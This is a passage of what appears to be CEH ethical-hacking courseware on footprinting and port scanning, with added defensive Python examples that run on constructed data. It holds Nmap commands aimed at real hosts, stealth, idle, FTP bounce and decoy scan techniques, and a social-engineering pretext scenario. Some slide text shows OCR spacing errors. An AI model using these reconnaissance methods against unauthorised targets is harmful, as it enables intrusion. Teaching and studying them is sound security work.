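        name = names.get(ip) if ip else None
        out.append((ttl, ip or "*", name, affiliation(name)))
    return out


# Constructed sample path: documentation-range addresses and invented names.
SAMPLE_PATH = Path(
    routers=[
        Router("192.0.2.1", "gw.office.example"),
        Router("198.51.100.1", "core1.nyc.transit-isp.example"),
        Router("198.51.100.9", silent=True),             # no ICMP back from here
        Router("203.0.113.1", "edge2.lon.hosting-co.example"),
    ],
    destination=Router("203.0.113.80", "www.target.example"),
)
```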
Tool: NeoTrace (Now McAfee Visual Trace)

NeoTrace shows the traceroute output visually: map view, node view, and IP view.

[Screenshot: NeoTrace Professional tracing www.google.com in map view and list view. The 12 hops run from an Emirates Internet (EMIRNET) address through emix.ae, Cable & Wireless (cw.net), pccwbtn.net and an Exodus router to www.google.com; the list shows per-hop IP address, name, response time (135 to 713 ms), loss (0%) and network]
Tool: Visual Route Trace

• www.visualware.com/download/

[Screenshot: VisualRoute 7.1c Trial Version, report for www.visualware.com [198.64.153.97]. Analysis: www.visualware.com is a HTTP server (running Apache/1.3.27 (Unix) mod_jk/1.2.0). The hop table (columns Hop, %Loss, IP Address, Node Name, Location, Tzone, ms, Graph, Network) lists 14 hops from the United Arab Emirates (Emirates Internet, Emirates Telecommunications) via Teleglobe to Verio routers in Newark NJ, New York, Ashburn VA and Sterling VA. Roundtrip time to www.visualware.com, average = 430ms, min = 420ms, max = 436ms - Mar 18, 2003 2:36:39 PM]

It shows the connection path and the places where bottlenecks occur.
Tool: SmartWhois

• http://www.softdepia.com/smartwhois_download_491.html

SmartWhois is a useful network information utility that allows you to find out all available information about an IP address, host name, or domain, including country, state or province, city, name of the network provider, administrator, and technical support contact information.

Unlike standard Whois utilities, SmartWhois can find the information about a computer located in any part of the world, intelligently querying the right database and delivering all the related records within a few seconds.

[Screenshot: SmartWhois query for microsoft.com (207.46.134.222), returning Microsoft Corporation, One Microsoft Way, Redmond, WA 98052, US, phone 425-882-8080, and the name servers DNS1.CP.MSFT.NET (207.46.138.20), DNS3.UK.MSFT.NET (213.199.144.151) and DNS1.SJ.MSFT.NET (65.54.248.222)]
Scenario (cont.)

Adam makes a few searches and gets some internal contact information. He calls the receptionist and informs her that HR has asked him to get in touch with a specific IT division personnel. It's lunch hour, and he says he'd rather mail the person concerned than disturb him. He checks out the mail ID on newsgroups and stumbles on an IP recording. He traces the IP destination.

• What preventive measures can you suggest to check the availability of sensitive information?

• What are the implications for the target company? Can he cause harm to targetcompany at this stage?

• What do you think he can do with the information he has obtained?
Screenshot: Visual Route Mail Tracker

[Screenshot: VisualRoute trace to olympus.bic.nus.edu.sg. The hop table (columns Hop, %Loss, IP Address, Node Name, Location, Tzone, ms, Graph, Network) lists 24 hops from the United Arab Emirates (Emirates Internet, Emirates Telecommunications) through the United Kingdom (FLAG Telecom), Level 3 Communications in San Francisco, San Jose and Palo Alto, and SingTel to the National University of Singapore. Roundtrip time to olympus.bic.nus.edu.sg, average = 3115ms, min = 1133ms, max = 4296ms - Mar 13, 2003 2:23:03 PM]

It shows the number of hops made and the respective IP addresses, the node name, location, time zone, network, etc.
Tool: eMailTrackerPro

eMailTrackerPro by Visualware

[Screenshot: analysis of an e-mail with the subject "Long Distance - 4.9 cents per min - NO FEES!"]

e-mail Analysis:

From: IP address 203.127.89.138.

Location: Singapore - For a detailed geographic trace, run VisualRoute.

Mailer: The sender used 'QUALCOMM Windows Eudora Pro Version 4.1' to send the e-mail.

Received Headers: Attempted misdirection: 'tesla623.OneMail.com.sg' is not 203.127.89.129 in R1. Attempted misdirection: 'drb.com' is not 203.127.89.138 in R2.

eMailTrackerPro is the email analysis tool that enables analysis of an email and its headers automatically and provides graphical results.
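What eMailTrackerPro reports as "attempted misdirection" can be reproduced from the Received headers alone. As an added example (not the tool's code), this Python walks the Received chain of a constructed message from the sender's connection upwards, extracts the originating IP and the X-Mailer value, compares each hop's claimed (HELO) name with the reverse DNS name the receiving server recorded, and flags hops where they disagree. A mismatch is a signal rather than proof: legitimate senders whose forward and reverse DNS are inconsistent produce it too.

```python
import email
import re

# Constructed message; names and addresses are placeholders, not the ones in
# the screenshot. Received headers are prepended by each relay, so the top one
# is the last hop and the bottom one is the sender's own connection.
SAMPLE_MESSAGE = """\
Received: from mx1.corp.example (mx1.corp.example [198.51.100.5])
\tby mailstore.corp.example with ESMTP id A1B2C3; Fri, 1 Mar 2024 10:05:00 +0000
Received: from relay.onemail.example (host-138.isp.example [203.0.113.138])
\tby mx1.corp.example with ESMTP id D4E5F6; Fri, 1 Mar 2024 10:04:58 +0000
From: sender@onemail.example
To: analyst@corp.example
Subject: Long Distance - 4.9 cents per min - NO FEES!
X-Mailer: Example Mailer 4.1
Date: Fri, 1 Mar 2024 10:04:30 +0000

(body)
"""

# "from <HELO name> (<reverse DNS> [<IP>]) by <receiving host>"; the reverse
# DNS part is optional because some MTAs log only "([ip])".
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>[^\s\[\]]+)\s+)?\[(?P<ip>[0-9.]+)\]\)"
    r"\s+by\s+(?P<by>\S+)",
    re.IGNORECASE,
)


def parse_received(header: str):
    """Unfold one Received header and pull out HELO name, rDNS, IP and relay."""
    m = RECEIVED_RE.search(" ".join(header.split()))
    return m.groupdict() if m else None


def analyse(raw: str) -> dict:
    """Origin IP, mailer and misdirection findings, in eMailTrackerPro's terms."""
    msg = email.message_from_string(raw)
    hops = [h for h in (parse_received(r) for r in msg.get_all("Received", [])) if h]
    hops.reverse()                      # R1 is now the sender's connection
    result = {
        "origin_ip": hops[0]["ip"] if hops else None,
        "mailer": msg.get("X-Mailer"),
        "hops": hops,
        "misdirection": [],
    }
    for n, hop in enumerate(hops, start=1):
        rdns = hop["rdns"]
        if rdns and rdns.lower() != hop["helo"].lower():
            result["misdirection"].append(
                f"'{hop['helo']}' is not {hop['ip']} ({rdns}) in R{n}")
    return result
```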
Tool: Read Notify (readnotify.com)

[Screenshot: the ReadNotify.com home page ("ReadNotify lets you know when email you've sent gets read"; "Length of Reading: find out how long they read your email for"), with member sign-in]

Mail tracking is a tracking service that allows the user to track when his mail was read, for how long and how many times, and the place from where the mail has been posted. It also records forwards and passing of sensitive information (MS Office format).
Website Watcher

• Website watchers can be used to get updates on a website.

• They can be used for competitive advantage.
WebSite-Watcher

[Screenshot: the WebSite-Watcher main window. The left pane lists bookmark folders (All Bookmarks, Changed Bookmarks, HotSites, AutoWatch, Disabled Bookmarks, Errors, Trash, General, Magazines, News, Private, Programming, Components, FAQ, Tools, Software) with their bookmark counts; the right pane lists the watched bookmarks (WebSite-Watcher [PAD], FTP-Uploader, NetCaptor, Opera, PAD Gen, The Bat, WebSite-Watcher BETA, WinRAR) with URL, last check (28-NOV-2001) and Status OK. The lower pane shows the changes detected on a page, in this case a software changelog.]
Website Watcher

[Screenshot: the same WebSite-Watcher main window, with the folder tree, the bookmark list (80 bookmarks, 5 changed) and the change-highlight pane showing a page's changelog entries]
Website Watcher

[Screenshot: the bookmark properties dialog for "WebSite-Watcher BETA" (http://aignes.net/beta/beta.htm). Fields and options: Alternative Check-URL (if empty, URL will be checked); Checking-method (by content, by file-date, by file-size, Don't check); options when checking websites for changes (Ignore all links and images/banners, Ignore all HTML-Tags, Ignore userdefined strings, Watch only userdefined strings, Ignore all numbers, Ignore all typical date-strings); Test filter; Compare versions; OK, Cancel, Help]
Website Watcher

[Screenshot: the WebSite-Watcher search dialog (Search for: "website-w"; Folder: All Bookmarks or Selected folder, Include Subfolders; Where: Bookmarks, New Versions (file), Old Versions (file)) and a search result showing a saved page, the WebSite-Watcher PAD description (Release Date 11/09/2001, Major Update, Shareware, Cost 29.95; keywords Bookmark Checker, Bookmark Organizer, Update Checker, Link Checker, Favorites Checker, WebSite Download, Offline Reader, Offline Browser; description: checks your favorite websites for updates and changes with a minimum of time and online-costs, and when changes are detected saves the last two versions of websites to your harddisk)]
Steps to Perform Footprinting

• Find the company's external and internal URLs.

• Perform a whois lookup for personal details.

• Extract DNS information.

• Mirror the entire website and look up names.

• Extract archives of the website.

• Google search for the company's news and press releases.

• Use people search for personal information of employees.

• Find the physical location of the web server using the tool "NeoTrace."

• Analyze the company's infrastructure details from job postings.

• Track the email using "readnotify.com."
• The information gathering phase can be categorized broadly into seven phases.

• Footprinting renders a unique security profile of a target system.

• Whois and ARIN can reveal public information about a domain that can be leveraged further.

• Traceroute and mail tracking can be used to target a specific IP and later for IP spoofing.

• Nslookup can reveal specific users, and zone transfers can compromise DNS security.
Ethical Hacking

Module III
Scanning

Jack and Dave were colleagues. It was Jack's idea to come up with an e-business company. However, conflicts in ideas saw them split apart.

Dave heads a venture-capital funded e-business start-up company now. Jack felt cheated and wanted to strike back at Dave's company.

He knew that due to intense pressure to get into the market quickly, these start-ups often build their infrastructures too fast to give security the thought it deserves.

• Do you think that Jack is correct in his assumption?

• What information does Jack need to launch an attack on Dave's company?

• Can Jack map the entire network of the company without being traced back?
Module Objectives

• Definition of scanning
• Objectives of scanning
• Types of scanning
• CEH scanning methodology
• Scanning techniques
• Scanning tools
• OS fingerprinting
• Countermeasures
Module Flow

[Diagram: the module flow, with the nodes Scanning Objectives, Types of scanning, Use of proxy servers in attack, and Countermeasures]
Scanning - Definition

• One of the three components of intelligence gathering for an attacker.

• The attacker finds information about:

  - the specific IP addresses
  - operating systems
  - the system architecture
  - the services running on each computer

The various types of scanning are as follows:

• Port scanning
• Network scanning
• Vulnerability scanning
Types of Scanning

• Port scanning

  - A series of messages sent by someone attempting to break into a computer to learn about the computer's network services.
  - Each service is associated with a "well-known" port number.

• Network scanning

  - A procedure for identifying active hosts on a network.
  - Either for the purpose of attacking them or for network security assessment.

• Vulnerability scanning

  - The automated process of proactively identifying vulnerabilities of computing systems present in a network.
Objectives of Scanning

• To detect the live systems running on the network

• To discover which ports are active/running

• To discover the operating system running on the target system (fingerprinting)

• To discover the services running/listening on the target system

• To discover the IP address of the target system
CEH Scanning methodology

[Diagram: the CEH scanning methodology flow, with the nodes Banner grabbing / OS fingerprinting, Draw network diagrams of vulnerable hosts, Prepare proxies, and ATTACK!!]
Checking for live systems

Checking for live systems - ICMP Scanning

• In this type of scanning, it is found out which hosts are up in a network by pinging them all.

• ICMP scanning can be run in parallel so that it runs fast.

• It can also be helpful to tweak the ping timeout value with the -t option.
Angry IP

• An IP scanner for Windows.

• Can scan IPs in any range.

• It simply pings each IP address to check if it is alive.

• Provides NetBIOS information such as:

  - Computer name
  - Workgroup name
  - MAC address
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HPING2

• HPING is a command-line oriented TCP/IP packet assembler/analyzer.
• It not only sends ICMP echo requests but also supports
  - TCP,
  - UDP,
  - ICMP and
  - Raw-IP protocols
• It has a traceroute mode.
• The ability to send files over a covert channel.
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Features

• Firewall testing
• Advanced port scanning
• Network testing, using different protocols, TOS, fragmentation
• Advanced traceroute, under all the supported protocols
• Remote OS fingerprinting
• Remote uptime guessing
• TCP/IP stacks auditing
Ping Sweep

• A ping sweep (also known as an ICMP sweep) is a basic network scanning technique used to determine which of a range of IP addresses map to live hosts (computers).
• A ping sweep consists of ICMP ECHO requests sent to multiple hosts.
• If a given address is live, it will return an ICMP ECHO reply.
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Firewalk

• Firewalk is a network-auditing tool.
• It attempts to determine what type of transport protocols a given gateway will let through.
• The Firewalk scans work by sending out TCP or UDP packets with an IP TTL which is one greater than the targeted gateway.

[Figure: Firewalking host → packet filter at hop n → destination host at hop n+m (m>1)]
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Checking for open ports

Nmap

• Nmap is a free open source utility for network exploration.
• It is designed to rapidly scan large networks.

Features

• Nmap is used to carry out port scanning, OS detection, version detection, ping sweep and many other techniques
• It scans a large number of machines at one go.
• It is supported by many operating systems
• It can carry out all types of port scanning techniques
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[Screenshot: Nmap Front End with target www.insecure.org, scan type SYN Stealth, scanned ports "Most important [fast]", OS Detection and Version Probe enabled. Output pane:]

Starting nmap 3.49 ( http://www.insecure.org/nmap/ ) at 2003-12-19 14:28 PST
Interesting ports on www.insecure.org (205.217.153.53):
(The 1212 ports scanned but not shown below are in state: filtered)
PORT     STATE  SERVICE  VERSION
22/tcp   open   ssh      OpenSSH 3.1p1 (protocol 1.99)
25/tcp   open   smtp     qmail smtpd
53/tcp   open   domain   ISC Bind 9.2.1
80/tcp   open   http     Apache httpd 2.0.39 ((Unix) mod_perl/1.99_07-dev Perl/v5.6.1)
113/tcp  closed auth
Device type: general purpose
Running: Linux 2.4.X|2.5.X
OS details: Linux Kernel 2.4.0 - 2.5.20
Uptime 212.119 days (since Wed May 21 12:38:26 2003)
Nmap run completed -- 1 IP address (1 host up) scanned in 33.792 seconds

Command: nmap -sS -sV -O -F -R -T4 www.insecure.org
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Nmap: Scan Methods

• Some of the scan methods used by Nmap:
  - Xmas tree: The attacker checks for TCP services by sending "Xmas-tree" packets.
  - SYN stealth: It is referred to as "half-open" scanning, as a full TCP connection is not opened
  - Null Scan: It's an advanced scan that may be able to pass through firewalls unmolested
  - Window scan: It is similar to the ACK scan and can also detect open ports
  - ACK Scan: used to map out firewall rulesets.
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[Screenshot: Nmap front end scan mode selector listing Connect, SYN Stealth, FIN Stealth, Ping Sweep, UDP Port Scan, Null Scan, Xmas Tree, IP Protocol Scan, ACK Scan, Window Scan, RPC Scan and List Scan]
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SYN Stealth / Half Open Scan

• It is often referred to as a half open scan because it doesn't open a full TCP connection.
• First a SYN packet is sent to a port of the machine, suggesting a request for connection, and the response is awaited.
• If the port sends back a SYN/ACK packet, then it is inferred that a service at the particular port is listening. If an RST is received, then the port is not active/listening. As soon as the SYN/ACK packet is received an RST packet is sent, instead of an ACK, to tear down the connection.
• The key advantage of this scan is that fewer sites log this.



© Standard TCP communications are controlled by flags in the TCP packet header. 
© The flags are as follows: 

• Synchronize- also called "SYN" 

- U sed to i n i ti ate a con necti on between hosts. 

• Acknowledgement - also called "ACK" 

- Used i n estabi ishi ng a connection between hosts 

• Push-"PSH" 

- I nstructs recei vi ng system to send al I buffered data i mmedi atel y 

• Urgent- "URG" 

- States that the data contai ned i n the packet shoul d be processed 
immediately 

• Finish - also called "Fl N" 

- Tells remote system that there will be no more transmissions 

• Reset - also called "RST" 

- Also used to reset a connection. 
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Three Way Handshake

Computer A                                 Computer B
192.168.1.2:2342 ------ syn ------> 192.168.1.3:80
192.168.1.2:2342 <---- syn/ack ---- 192.168.1.3:80
192.168.1.2:2342 ------ ack ------> 192.168.1.3:80
Connection Established

• The Computer A (192.168.1.2) initiates a connection to the server (192.168.1.3) via a packet with only the SYN flag set.
• The server replies with a packet with both the SYN and the ACK flag set.
• For the final step, the client responds back to the server with a single ACK packet.
• If these three steps are completed without complication, then a TCP connection has been established between the client and server.
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[SYN stealth scan exchange]

Computer A                                 Computer B
192.168.1.2:2342 ------ syn ------> 192.168.1.3:80
192.168.1.2:2342 <---- syn/ack ---- 192.168.1.3:80
192.168.1.2:2342 ------ RST ------> 192.168.1.3:80

• Client sends a single SYN packet to the server on the appropriate port.
• If the port is open then the server responds with a SYN/ACK packet.
• If the server responds with an RST packet, then the remote port is in state "closed".
• The client sends an RST packet to close the initiation before a connection can ever be established.
• This scan is also known as "half-open" scan.
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Xmas Scan

Computer A                                   Computer B
Xmas scan directed at open port:
192.5.5.92:4031 --- FIN/URG/PSH ---> 192.5.5.110:23
192.5.5.92:4031 <-- NO RESPONSE ---- 192.5.5.110:23

Xmas scan directed at closed port:
192.5.5.92:4031 --- FIN/URG/PSH ---> 192.5.5.110:23
192.5.5.92:4031 <---- RST/ACK ------ 192.5.5.110:23

• Note: Xmas scan only works if the OS's TCP/IP implementation is developed according to RFC 793.
• Xmas Scan will not work against any current version of Microsoft Windows.
• Xmas scans directed at any Microsoft system will show all ports on the host as being closed.
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FIN Scan

Computer A                                   Computer B
FIN scan directed at open port:
192.5.5.92:4031 ------- FIN -------> 192.5.5.110:23
192.5.5.92:4031 <-- NO RESPONSE ---- 192.5.5.110:23

FIN scan directed at closed port:
192.5.5.92:4031 ------- FIN -------> 192.5.5.110:23
192.5.5.92:4031 <---- RST/ACK ------ 192.5.5.110:23

• Note: FIN scan only works if the OS's TCP/IP implementation is developed according to RFC 793.
• FIN Scan will not work against any current version of Microsoft Windows.
• FIN scans directed at any Microsoft system will show all ports on the host as being closed.
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NULL Scan

Computer A                                   Computer B
NULL scan directed at open port:
192.5.5.92:4031 --- NO FLAGS SET ---> 192.5.5.110:23
192.5.5.92:4031 <--- NO RESPONSE ---- 192.5.5.110:23

NULL scan directed at closed port:
192.5.5.92:4031 --- NO FLAGS SET ---> 192.5.5.110:23
192.5.5.92:4031 <----- RST/ACK ------ 192.5.5.110:23

• Note: NULL scan only works if the OS's TCP/IP implementation is developed according to RFC 793.
• NULL Scan will not work against any current version of Microsoft Windows.
• NULL scans directed at any Microsoft system will show all ports on the host as being closed.
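As an added example (not part of the courseware), the following Python decodes the flag bits described under "TCP Communication Flags" from a raw TCP header and labels the SYN, Xmas, FIN and NULL probe shapes shown on the preceding slides, the way a network sensor would, over constructed sample traffic; the addresses, ports and the sweep threshold are assumptions.

```python
"""Classify TCP probes by flag combination, the way a detector would.

Added example, not from the CEH courseware: it decodes the six classic flags
(URG/ACK/PSH/RST/SYN/FIN) from a raw 20-byte TCP header and labels the probe
shapes the slides describe (SYN, ACK, FIN, Xmas, NULL), then summarises
constructed sample traffic per source address.
"""
import struct

# Flag bits in the low byte of the "data offset / flags" word (RFC 793 order).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
FLAG_NAMES = [(URG, "URG"), (ACK, "ACK"), (PSH, "PSH"),
              (RST, "RST"), (SYN, "SYN"), (FIN, "FIN")]


def parse_tcp_header(hdr: bytes) -> dict:
    """Decode the fixed 20-byte TCP header: ports, seq/ack, flag set, window."""
    if len(hdr) < 20:
        raise ValueError("TCP header shorter than 20 bytes")
    sport, dport, seq, ack, off_flags, window = struct.unpack("!HHIIHH", hdr[:16])
    bits = off_flags & 0x3F  # upper 4 bits are the data offset, not flags
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "window": window,
            "flags": {name for bit, name in FLAG_NAMES if bits & bit}}


def classify_probe(flags: set) -> str:
    """Map a flag set to the probe type named on the slides, or 'normal'."""
    if not flags:
        return "null-scan"            # no flags at all: NULL scan
    if flags == {"FIN", "URG", "PSH"}:
        return "xmas-scan"            # the "lit up" Xmas tree combination
    if flags == {"FIN"}:
        return "fin-scan"             # bare FIN, never seen in a real session
    if flags == {"SYN"}:
        return "syn"                  # SYN scan or an ordinary connect()
    if flags == {"ACK"}:
        return "ack-probe"            # ACK scan / window scan shape
    return "normal"                   # anything else, e.g. ACK with data


def build_tcp_header(sport: int, dport: int, flags: int, window: int = 1024) -> bytes:
    """Assemble a minimal TCP header (data offset 5, zero checksum) for the
    constructed sample input below; it is only parsed locally, never sent."""
    off_flags = (5 << 12) | (flags & 0x3F)
    return struct.pack("!HHIIHHHH", sport, dport, 0, 0, off_flags, window, 0, 0)


def summarize_by_source(packets, syn_port_threshold: int = 10) -> dict:
    """packets: iterable of (src_ip, tcp_header_bytes).

    Returns {src_ip: verdict}. Any NULL/Xmas/FIN probe is enough for a
    'stealth-scan' verdict, because RFC-compliant stacks never emit those
    shapes; bare SYNs to many distinct ports from one source are a 'syn-sweep'.
    """
    per_src = {}
    for src, hdr in packets:
        pkt = parse_tcp_header(hdr)
        kind = classify_probe(pkt["flags"])
        stats = per_src.setdefault(src, {"syn_ports": set(), "anomalous": 0})
        if kind == "syn":
            stats["syn_ports"].add(pkt["dport"])
        elif kind in ("null-scan", "xmas-scan", "fin-scan"):
            stats["anomalous"] += 1
    verdicts = {}
    for src, stats in per_src.items():
        if stats["anomalous"]:
            verdicts[src] = "stealth-scan"
        elif len(stats["syn_ports"]) >= syn_port_threshold:
            verdicts[src] = "syn-sweep"
        else:
            verdicts[src] = "benign"
    return verdicts


# Constructed sample traffic (not captured from any real network).
SAMPLE_PACKETS = (
    # 10.0.0.5 sends one bare SYN to each of twelve ports: a SYN sweep.
    [("10.0.0.5", build_tcp_header(40000 + i, port, SYN))
     for i, port in enumerate([21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445])]
    # 10.0.0.9 sends the Xmas (FIN/URG/PSH) and NULL probes from the slides.
    + [("10.0.0.9", build_tcp_header(4031, 23, FIN | URG | PSH)),
       ("10.0.0.9", build_tcp_header(4031, 23, 0))]
    # 10.0.0.7 is an ordinary client: SYN, then ACK and PSH/ACK on port 80.
    + [("10.0.0.7", build_tcp_header(51000, 80, SYN)),
       ("10.0.0.7", build_tcp_header(51000, 80, ACK)),
       ("10.0.0.7", build_tcp_header(51000, 80, PSH | ACK))]
)

if __name__ == "__main__":
    for src, verdict in summarize_by_source(SAMPLE_PACKETS).items():
        print(f"{src:10} {verdict}")
```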
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IDLE Scan

• Almost four years ago, security researcher Antirez posted an innovative new TCP port scanning technique.
• Idlescan, as it has become known, allows for completely blind port scanning.
• Attackers can actually scan a target without sending a single packet to the target from their own IP address.
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IDLE Scan: Basics

• Most network servers listen on TCP ports, such as web servers on port 80 and mail servers on port 25.
• A port is considered "open" if an application is listening on the port, otherwise it is closed.
• One way to determine whether a port is open is to send a "SYN" (session establishment) packet to the port.
• The target machine will send back a "SYN|ACK" (session request acknowledgment) packet if the port is open, and a "RST" (Reset) packet if the port is closed.
• A machine which receives an unsolicited SYN|ACK packet will respond with a RST. An unsolicited RST will be ignored.
• Every IP packet on the Internet has a "fragment identification" number.
• Many operating systems simply increment this number for every packet they send.
• So probing for this number can tell an attacker how many packets have been sent since the last probe.
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IDLE Scan: Step 1

• Choose a "zombie" and probe for its current IPID number.

[Figure: the Attacker sends an IPID probe (SYN|ACK packet) to the Zombie; the Zombie answers with an RST packet. Response: IPID=31337]
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IDLE Scan: Step 2

• Send forged packet "from" Zombie to target.

[Figure, probe to OPEN port 80: the Attacker sends a session request "from" Z (SYN to port 80; Src IP: Z) to the Target. The Target answers the Zombie with SYN|ACK (bogus session); the Zombie replies RST, IPID=31338.]
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[Figure, probe to CLOSED port 42: the Attacker sends a session request "from" Z (SYN to port 42; Src IP: Z) to the Target. The Target answers the Zombie with RST, which the Zombie ignores.]
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IDLE Scan: Step 3

• Probe Zombie IPID again.

[Figure, open case: IPID probe (SYN|ACK) to the Zombie; Response: IPID=31339, RST. IPID increased by 2 since step 1, so port 80 on the target must be open!]
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[Figure, closed case: IPID probe (SYN|ACK) to the Zombie; Response: IPID=31338, RST. IPID increased by 1 since step 1, so port 42 on the target must be closed.]
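An added example (not from the courseware) of how a defender would audit a host's IP ID behaviour for the side channel the idle-scan slides describe: it classifies a series of observed IP IDs and carries the step-3 inference through with the slides' IPID values, also handling the 16-bit wraparound the slides do not discuss. All sample sequences and the "busy" tolerance are constructed assumptions.

```python
"""Audit IP ID generation for the predictable pattern an idle scan relies on.

Added example, not from the CEH courseware. A defender can collect the IP ID
of successive replies from a host they own and check whether the IDs simply
increment (the "zombie" property the slides describe); randomised or constant
IDs close the side channel. infer_port_state() reproduces the step-3 reasoning
from the slides with 16-bit wraparound handled. All sample sequences are
constructed.
"""

IPID_MODULUS = 1 << 16  # the IP identification field is 16 bits wide


def ipid_delta(before: int, after: int) -> int:
    """Packets sent between two observations, modulo 2^16 (handles wraparound)."""
    return (after - before) % IPID_MODULUS


def classify_ipid_sequence(ids) -> str:
    """Classify a list of IP IDs observed in successive replies.

    'incremental'      : +1 each time, the usable-zombie pattern
    'incremental-busy' : still sequential, but other traffic interleaves
                         (tolerance of up to 10 per step is an assumption)
    'constant'         : all zero, a pattern some stacks use
    'random'           : unpredictable, not usable as a zombie
    """
    ids = list(ids)
    if len(ids) < 3:
        raise ValueError("need at least three samples")
    if all(i == 0 for i in ids):
        return "constant"
    deltas = [ipid_delta(a, b) for a, b in zip(ids, ids[1:])]
    if all(d == 1 for d in deltas):
        return "incremental"
    if all(1 <= d <= 10 for d in deltas):
        return "incremental-busy"
    return "random"


def infer_port_state(ipid_step1: int, ipid_step3: int) -> str:
    """Step-3 reasoning from the slides. The step-3 probe itself costs the
    zombie one RST (+1). A second increment means the zombie also answered a
    SYN|ACK from the target, i.e. the forged SYN reached an open port."""
    d = ipid_delta(ipid_step1, ipid_step3)
    if d == 1:
        return "closed"         # target sent RST (ignored by the zombie) or nothing
    if d == 2:
        return "open"
    return "indeterminate"      # zombie was not idle; the sample is unusable


# Constructed sample sequences, one IP ID per reply.
SAMPLE_SEQUENTIAL = [31337, 31338, 31339, 31340]
SAMPLE_WRAPPING = [65534, 65535, 0, 1]      # crosses the 16-bit boundary
SAMPLE_BUSY = [100, 103, 104, 109]
SAMPLE_RANDOM = [31337, 9041, 52311, 18]
SAMPLE_ZERO = [0, 0, 0, 0]

if __name__ == "__main__":
    for name, seq in [("sequential", SAMPLE_SEQUENTIAL), ("wrapping", SAMPLE_WRAPPING),
                      ("busy", SAMPLE_BUSY), ("random", SAMPLE_RANDOM), ("zero", SAMPLE_ZERO)]:
        print(f"{name:10} -> {classify_ipid_sequence(seq)}")
    print("31337 -> 31339:", infer_port_state(31337, 31339))  # the slide's open case
```

A host that reports "incremental" here can be abused as a zombie; enabling randomised IP IDs on it removes the information the step-3 probe depends on.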
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ICMP echo scanning / List Scan

• ICMP echo scanning
  - This isn't really port scanning, since ICMP doesn't have a port abstraction.
  - But it is sometimes useful to determine what hosts in a network are up by pinging them all.
  - nmap -P cert.org/24 152.148.0.0/16

• List Scan
  - This type of scan simply generates and prints a list of IPs/Names without actually pinging or port scanning them.
  - A DNS name resolution will also be carried out.
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TCP Connect / Full

• This is the most reliable form of TCP scanning. The connect() system call provided by the operating system is used to open a connection to every open port on the machine.
• If the port is open then the connect() will succeed, and if the port is closed then it is unreachable.

[Figure: full three-way handshake: SYN →, ← SYN+ACK, ACK →]
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FTP Bounce Scan

• A type of port scanning which makes use of the Bounce attack vulnerability in FTP servers.
• This vulnerability allows a person to request that the FTP server open a connection to a third party on a particular port. Thus the attacker can use the FTP server to do the port scan and then send back the results.
• Bounce attack: This is an attack that is similar to IP spoofing. The anonymity of the attacker can be maintained.
• The scan is hard to trace, permits access to local networks and evades firewalls.
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FTP Bounce Attack

[Figure: FTP bounce attack via a Bounce FTP Server]
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SYN/FIN scanning using IP fragments

• It is not a new scanning method but a modification of earlier methods.
• The TCP header is split up into several packets so that the packet filters are not able to detect what the packets intend to do.
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UDP Scanning

• UDP RAW ICMP Port Unreachable Scanning
  - This scanning method uses the UDP protocol instead of the TCP protocol.
  - Though this protocol is simpler, scanning it is more difficult.

• UDP recvfrom() Scanning
  - While non-root users can't read port unreachable errors directly, Linux is cool enough to inform the user indirectly when they have been received.
  - This is the technique used for determining the open ports by non-root users.
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Reverse Ident Scanning

• The Ident protocol allows for the disclosure of the user name of the owner of any process connected via TCP, even if that process didn't initiate the connection.
• So a connection can be established to the HTTP port and then ident used to find out whether the server is running as root. This can be done only with a full TCP connection to the target port.
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RPC Scan

• This method works in combination with all other port scan methods.
• It scans all the TCP/UDP ports and then floods them with Sun RPC program NULL commands in an attempt to determine whether they are RPC ports, and if so, what version number and programs they serve.
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Window Scan

• This scan is very much similar to the ACK scan, except that it can sometimes detect open ports as well as filtered/unfiltered ports due to an anomaly in the TCP window size reporting by some operating systems.
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NMAP Scan Options

• -sT (TCP Connect)
• -sS (SYN scan)
• -sF (FIN scan)
• -sX (Xmas scan)
• -sN (Null scan)
• -sP (Ping scan)
• -sU (UDP scans)
• -sO (Protocol scan)
• -sI (Idle scan)
• -sA (ACK scan)
• -sW (Window scan)
• -sR (RPC scan)
• -sL (List/DNS scan)
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NMAP Scan Options

• -P0 (don't ping)
• -PT (TCP ping)
• -PS (SYN ping)
• -PI (ICMP ping)
• -PB (= PT + PI)
• -PP (ICMP timestamp)
• -PM (ICMP netmask)
NMAP Output Format

• -oN (normal)
• -oX (XML)
• -oG (grepable)
• -oA (all)

NMAP Timing Options

• -T Paranoid - serial scan & 300 sec wait
• -T Sneaky - serialize scans & 15 sec wait
• -T Polite - serialize scans & 0.4 sec wait
• -T Normal - parallel scan
• -T Aggressive - parallel scan & 300 sec timeout & 1.25 sec/probe
• -T Insane - parallel scan & 75 sec timeout & 0.3 sec/probe
• --host_timeout, --max_rtt_timeout (default 9000)
• --min_rtt_timeout, --initial_rtt_timeout (default 6000)
• --max_parallelism, --scan_delay (between probes)
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NMAP Options

• --resume (scan), --append_output
• -iL <targets_filename>, -p <port ranges>
• -F (fast scan mode), -D <decoy1[,decoy2][,ME],...>
• -S <SRC_IP_Address>, -e <interface>
• -g <portnumber>, --data_length <number>
• --randomize_hosts, -O (OS fingerprinting), -I (ident-scan)
• -f (fragmentation), -v (verbose), -h (help)
• -n (no reverse lookup), -R (do reverse lookup)
• -r (don't randomize port scan), -b <ftp relay host> (FTP bounce)
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IPSecScan

[Screenshot: ipEye usage output]

ipEye 1.2 - (c) Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
 - http://ntsecurity.nu/toolbox/ipeye/

Error: Too few parameters.
Usage:
  ipEye <target IP> <scantype> -p <port> [optional parameters]
  ipEye <target IP> <scantype> -p <from port> <to port> [optional parameters]

<scantype> is one of the following:
  -syn = SYN scan
  -fin = FIN scan
  -null = Null scan
  -xmas = Xmas scan
(note: FIN, Null and Xmas scans don't work against Windows systems.)

[optional parameters] are selected from the following:
  -sip <source IP> = source IP for the scan
  -sp <source port> = source port for the scan
  -d <delay in ms> = delay between scanned ports in milliseconds
     (default set to 750 ms)

IPSecScan is a tool that can scan either a single IP address or a range of IP addresses looking for systems that are IPSec enabled.
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NetScan Tools Pro 2003

[Screenshot: NetScanTools Pro 2003 Port Probe tab probing a 192.168.x.x host; responding TCP ports include 21 ftp, 23 telnet, 25 smtp, 80 http, 110 pop3, 280 http-mgmt, 515 printer, 631 ipp, and 5120 and 5121 unknown]
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It is used to

